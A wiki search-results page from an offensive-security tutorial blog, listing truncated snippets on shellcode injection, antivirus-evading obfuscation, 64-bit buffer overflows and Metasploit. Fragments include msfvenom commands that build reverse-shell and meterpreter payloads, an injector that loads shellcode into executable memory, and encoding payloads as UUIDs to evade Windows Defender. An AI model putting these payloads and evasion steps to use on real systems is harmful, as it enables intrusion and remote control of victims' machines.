NoSociety.de

#nosoc

Search

The results of your search are listed below.

Matching page names:

  • Obfuscation: polymorphic in-memory decoder
  • Obfuscation: Disguise shellcode as UUIDs
  • obfuscation_shellcode_als_uuids_tarnen_-_teil_1
  • Shellcode Injection Part 1
  • Shellcode Injection Part 2
  • Shellcode Injection Part 3
  • Shellcode Injection Part 4

Full-text results:

Obfuscation: polymorphic in-memory decoder @en:it-security:blog
47 hits, last modified: 9 months ago
d at disguising shellcode as a UUID in the source code. This also worked well, but the shellcode was rec... amed. The decoder starts with this instruction: <code asm> _start: jmp short call_decoder ; Begin of JMP-CALL-POP </code> ''%%JMP-CALL-POP%%'' is a technique that allows us to execute code independently of memory. In this first step, we n
Shellcode Injection Part 4 @en:it-security:blog
47 hits, last modified: 10 months ago
of ''calc.exe'' on a Windows computer * 64-bit code * Avoid null bytes ===== Preparations ===== =... t from [[https://www.ired.team/offensive-security/code-injection-process-injection/finding-kernel32-base... e used for the structure of the shellcode. ===== Code: Step by step ===== You can also find the complete code on [[https://github.com/psycore8/nosoc-shellcode/
Buffer overflow in the 64-bit stack - Part 3 @en:it-security:blog
40 hits, last modified: 10 months ago
ssue a system command when calling the function <code gdb> [-------------------------------------code-------------------------------------] 0x4011de <vuln... >: mov eax,0x0 0x4011f7 <vuln+134>: leave </code> \\ \\ ===== Dependencies ===== * socat mod [[... ps://docs.pwntools.com/en/stable/install.html)) <code bash> python3 -m pip install --upgrade pip python
Buffer overflow in the 64-bit stack - part 1 @en:it-security:blog
36 hits, last modified: 11 months ago
ileges.((https://www.ired.team/offensive-security/code-injection-process-injection/binary-exploitation/6... s://github.com/longld/peda/blob/master/README)) <code bash> git clone https://github.com/longld/peda.gi... peda echo "source ~/peda/peda.py" >> ~/.gdbinit </code> \\ \\ ==== Deactivate ASLR ==== ASLR must be de... ivated so that memory areas are not randomised. <code bash> echo 0 | sudo tee /proc/sys/kernel/randomiz
Shellcode Injection Part 1 @en:it-security:blog
31 hits, last modified: 11 months ago
rmat | | > shell.c | Save to the file shell.c | <code bash> msfvenom -p windows/shell_reverse_tcp LHOST... ta_ga_nai -i 8 -b '\x00\x0d\x0a' -f c > shell.c </code> \\ \\ ===== C++ Injector ===== We create a new ... = 540; int main(int argc, char** argv) { char* code; printf("#nosoc - expecttheunexpected"); code = (char*)VirtualAlloc(NULL, size, MEM_COMMIT,PAGE_E
Helpful NMAP scanner commands
30 hits, last modified: 17 months ago
=== Command Set ===== ==== Discover Hosts ==== <code bash> export IPRANGE='172.16.0.0/16' nmap -e tun0 -sn -v -oA pingscan $IPRANGE </code> ==== Parse Results ==== <code bash> grep Up pingscan.gnmap | awk '{print$2}' > 172_16_ping_ips.txt </code> ==== Discover Services ==== <code bash> nmap -
Obfuscation: ByteSwapping @en:it-security:blog
29 hits, last modified: 7 months ago
%%''|''%%F9%%''|''%%12%%''|''%%D1%%''| ===== The code ===== ==== Step 1: Python Encoder ==== The corr... e array * Return the byte array as the result <code python> def encrypt(data: bytes, xor_key: int... e = enc_byte return bytes(transformed) </code> ==== Step 2: Assembly ==== Now the assembly mu... cancels the encryption. You can find the complete code at the end of the article. === Step 2.1: Initial
Shellcode Injection Part 3 @en:it-security:blog
24 hits, last modified: 12 months ago
ome circumstances it may be necessary to load the code for the shell in the second step. In this blog p... a file via HTTP and then execute it. \\ \\ ===== Code ===== ==== C++ source ==== First, we need a sma... e shellcode into memory and then jumps into it. <code cpp> ... //buf represents the shellcode unsigned ... jump __asm { mov eax, target jmp eax } } </code> You can find the complete code in the [[https:/
Buffer overflow in the 64-bit stack - Part 2 @en:it-security:blog
23 hits, last modified: 10 months ago
80568|compiled debug binary]] from the blog. <code bash> br *vuln+73 # set breakpoint r < i... "/bin/sh") RIP: 0x400469 (<_init+25>: ret) </code> \\ \\ ===== Dependencies ===== What is needed? ... fer_overflow_x64|Part 1]], we also need ropper. <code bash> sudo apt install ropper </code> \\ \\ ===== Deactivate ASLR ===== ASLR must also be deactivated
Shellcode Injection Part 2 @en:it-security:blog
23 hits, last modified: 11 months ago
e tools as in part 1. You can download the source code from the [[https://github.com/psycore8/nosoc-shellcode|Github repository]]. \\ \\ ===== Code ===== ==== Explanation ==== Our code should receive the PID of the target process as a parameter at s... 'with the return value of the programme handle. <code cpp> processHandle = OpenProcess(PROCESS_ALL_ACCE
Group Managed Service Accounts
22 hits, last modified: 17 months ago
Preparations ===== Create root key on the DC: <code powershell> Add-KdsRootKey -EffectiveImmediately </code> Then wait 10 hours to ensure that the replicati... MSA account ===== ==== Create ==== On the DC: <code powershell> New-ADServiceAccount -Name <ACCOUNTNA... llowedToRetrieveManagedPassword <COMPUTERNAME>$ </code> ==== test ==== On the target system: <code po
Obfuscation: Disguise shellcode as UUIDs @en:it-security:blog
18 hits, last modified: 10 months ago
This is usually recognised by Windows Defender. <code bash> python shencode.py create -c="-p windows/x6... T=IPADDRESS LPORT=PORT -f raw -o shell_rev.raw" </code> ==== encode ==== We now encode this payload as UUID strings. <code bash> python shencode.py encode -f shell_rev.raw -u </code> The output now looks something like this: <cod
Host Discovery with Metasploit database
16 hits, last modified: 10 months ago
se and set up a user with access rights for it. <code bash> root@kali:~# msfdb init Creating database u... g/database.yml Creating initial database schema </code> ===== Metasploit: Connect database ===== <code ruby> msf6 > db_connect user:pass@127.0.0.1/db_name </code> ==== Check connection ==== <code ruby> msf6 >
SMB Hardening
14 hits, last modified: 17 months ago
Powershell (admin rights required) as follows: <code powershell>Get-WindowsOptionalFeature -Online -FeatureName SMB1Protocol</code> SMBv1 can also be deactivated via Powershell (restart required): <code powershell>Disable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol</code> === Server === The same commands apply to ser
FatCat Attack PoC @en:it-security:blog
14 hits, last modified: 17 months ago
rity pentest}} ====== FatCat Attack PoC ====== <code text> _____ _ ____ _ | ___|_ _| |_ ... | |_ |_| \__,_|\__|\____\__,_|\__| Attack PoC </code> | @orange:This PoC is for demonstration and tra... payload ==== * Start Metasploit * Open cmd <code dos>cmd</code> * Generate payload <code dos>msfvenom -a x86 --platform windows -p windows/meterprete
Privilege escalation: Windows admin thanks to Linux @en:it-security:blog
12 hits, last modified: 10 months ago
nmap SMBv1 Scan via Script
6 hits, last modified: 17 months ago
64-Bit Stack CheatSheet
4 hits, last modified: 10 months ago
Buffer Overflows - Intro
4 hits, last modified: 11 months ago
Secure passwords
4 hits, last modified: 17 months ago
OSI layer cyber attacks
3 hits, last modified: 17 months ago